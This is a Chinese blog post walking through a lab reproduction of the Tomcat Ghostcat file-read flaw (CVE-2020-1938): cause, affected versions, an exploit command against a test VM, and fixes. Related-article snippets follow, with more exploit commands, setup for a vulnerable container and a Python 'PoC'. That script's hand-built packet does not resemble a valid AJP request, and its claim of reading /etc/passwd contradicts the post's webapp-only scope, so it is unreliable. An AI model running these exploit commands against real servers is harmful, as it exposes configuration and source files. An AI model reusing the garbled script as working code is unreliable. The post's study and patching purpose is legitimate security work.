CVE-2020-1938漏洞复现

最新推荐文章于 2025-10-21 11:55:20 发布
原创 最新推荐文章于 2025-10-21 11:55:20 发布 · 1.9k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细解析了Apache Tomcat服务器存在的文件包含漏洞,包括漏洞原理、影响范围、复现步骤及修复方法。攻击者可通过构造恶意请求读取Tomcat上任意文件。

一、漏洞描述
Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat 上所有webapp 目录下的任意文件,如:webapp 配置文件或源代码等。
二、Tomcat任意文件读取漏洞
Tomcat默认开启AJP服务,运行在8009端口,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。
tomcat在接收ajp请求的时候调用org.apache.coyote.ajp.AjpProcessor来处理ajp消息,prepareRequest将ajp里面的内容取出来设置成request对象的Attribute属性。可以通过此种特性从而可以控制request对象的下面三个Attribute属性javax.servlet.include.request_urijavax.servlet.include.path_infojavax.servlet.include.servlet_path 再通过控制ajp控制的上述三个属性来读取文件,通过操控上述三个属性从而可以读取到应用目录下的任何文件。
三、影响范围
Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x
四、漏洞复现
因为现在来说这个漏洞已经不是那么新了,所以现在GitHub上也是有这个漏洞的POC/EXP https://github.com/zhzyker/exphub
我这边是自己搭了一个win8虚拟机,装好java和tomcat作为模拟环境
在脚本目录下执行命令python cve-2020-1938_exp.py -p 8009 -f WEB-INF/web.xml 192.168.123.42
tip:在命令行中执行python cve-2020-1938_exp.py -h能查看该脚本的命令参数
在这里插入图片描述
五、漏洞修复
1.更新到安全版本
2.关闭AJP服务 ,修改Tomcat配置文件Service.xml在其中将<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />语句注释掉等

tomcat ajp协议安全限制绕过漏洞_Apache tomcat 文件包含漏洞复现CVE20201938
weixin_39792747的博客
11-25 571
漏洞背景Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等。由于Tomcat本身也内含了一个HTTP服务器,它也可以被视作一个...
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程
m0_60607371的博客
04-06 1345
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 2万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
最新发布
2302_76672693的博客
10-21 815
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序序列化就是为了传输遍历,把一个对象类型的数据转换成字符串进行传输;
CVE-2020-1938漏洞复现(文末附EXP代码)
Vitaminapple的博客
05-31 1万+
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y
CVE-2020-1938 漏洞复现
weixin_48799157的博客
05-21 3676
漏洞描述 Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 7.0.100之前的7.*版本、8.5.51之前的8.*版本和9.0.31之前的9.*版本中的Tomcat AJP协议存在文件包含漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp 配置文件或源代码等。 影响版本 Apache Tomcat
精选资源
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
VMware_ESXI_OpenSLP漏洞利用代码集合_针对CVE-2020-3992和CVE-2019-5544的安全研究项目_提供漏洞复现和测试环境搭建指南_适用于虚拟化平台安.zip
09-05
VMware_ESXI_OpenSLP漏洞利用代码集合_针对CVE-2020-3992和CVE-2019-5544的安全研究项目_提供漏洞复现和测试环境搭建指南_适用于虚拟化平台安.zip
精选资源
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
精选资源
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
【Tomcat】CVE-2020-1938 漏洞复现&解决
yjw2017的博客
09-14 2255
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
【Tomcat 文件读取/文件包含(CVE-2020-1938)漏洞复现
一纸荒芜的博客
04-12 2378
CVE-2020-1938漏洞复现
漏洞复现笔记(CVE-2020-1938
weixin_72760965的博客
06-14 668
cve-2020-1938是一个出现在Apache-Tomcat-Ajp的文件包含漏洞,攻击者可以利用该漏洞读取包含Tomcat上所有的webapp目录下的任意文件,如:webapp配置文件或源代码。对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。通过nmap扫出开放端口:8080,8009,并且8009端口的AJP协议是开启的。然后直接通过exp读取。
[漏洞复现]CVE-2020-1938漏洞复现
cj_Hydra's Blog
03-30 2648
前言: 漏洞介绍:Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。 影响版本: Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0....
CVE-2020-1938复现
weixin_45931722的博客
01-28 7308
首先配置好Tomcat我在这里用的版本是8.0.49,JDK是1.8版本 查看到这边8009端口已经打开是AJP协议端口 我们在ROOT/WEB-INF目录下创建Test.txt 使用github的poc:cve-2020-1938_exp.py可以读取ROOT下的任意文件目录 (!!注意该脚本请使用Python2,我用的Python3.9会报错…!!!!) 读到了Test.txt中的hello world ...
CVE-2020-1938任意文件读取漏洞复现
weixin_45715461的博客
05-30 1万+
CVE-2020-1938任意文件读取漏洞复现
tomcat-ajp-cve-2020-1938 漏洞复现
04-05
### Tomcat AJP CVE-2020-1938 漏洞复现方法与攻击原理 #### 背景介绍 Tomcat AJP 协议中的文件包含漏洞CVE-2020-1938)允许攻击者通过构造恶意请求来读取服务器上的任意文件。此漏洞源于 AJP 协议处理不当,可能导致敏感数据泄露甚至远程代码执行。 --- #### 攻击原理 AJP 是一种二进制通信协议,用于在 Web 服务器(如 Apache HTTP Server)和应用服务器(如 Tomcat)之间传输数据。当启用 AJP 连接器时,如果未正确配置权限控制,则可能被滥用以访问受保护资源。具体来说,攻击者可以通过发送特殊格式的 AJP 请求到默认端口 `8009` 来触发漏洞[^2]。 --- #### 环境搭建 为了重现该漏洞,可以使用 Docker 镜像快速部署易受影响版本的 Tomcat 实例: ```bash docker pull duonghuuphuc/tomcat-8.5.32 docker run -d --name vulnerable-tomcat -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32 ``` 上述命令会启动一个带有已知漏洞的 Tomcat 容器实例,并映射必要的端口以便测试[^3]。 --- #### 利用工具准备 目前有多个开源项目可用于检测和利用此漏洞,以下是常用的两种方式: 1. **Ghostcat 工具** Ghostcat 提供了一个简单的界面来进行漏洞扫描和验证。可以从其官方仓库下载并运行: ```bash git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git cd Ghostcat-CNVD-2020-10487 python ghostcat.py http://<target-ip>:8009/ ``` 如果目标主机存在漏洞,工具将返回指定路径的内容[^4]。 2. **自定义 Python 脚本** 下面是一个基于 CNVD 的 PoC 脚本示例,可以直接修改后使用: ```python import socket def send_ajp_request(ip, port=8009, filename="/etc/passwd"): packet = b'\x12\x34\x00\x02\xfd\x00\x00\x00\x00\x00\xbb\x02\x4e' \ b'\x00\x00\x00\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ f'{filename}'.encode() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((ip, port)) sock.send(packet) response = sock.recv(1024).decode('utf-8', errors='ignore') if 'root:' in response: print("[+] Vulnerable! File content:") print(response.strip()) else: print("[-] Not vulnerable or file not found.") except Exception as e: print(f"[!] Error occurred: {str(e)}") finally: sock.close() if __name__ == "__main__": target_ip = input("Enter the IP address of the target server: ") send_ajp_request(target_ip) ``` 此脚本尝试连接至目标机器的 AJP 端口,并请求 `/etc/passwd` 文件内容作为演示[^1]。 --- #### 结果分析 一旦成功获取预期文件内容(例如 Linux 系统用户的密码列表),即可确认目标系统受到 CVE-2020-1938 影响。需要注意的是,在实际渗透测试过程中应严格遵循法律规范,仅针对授权范围内的资产操作。 --- #### 补救措施 为了避免此类风险,建议采取以下防护手段之一或组合实施: - 关闭不必要的 AJP 功能; - 使用防火墙限制对 AJP 端口的外部访问; - 更新至最新稳定版 Tomcat 并重新评估安全性设置。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值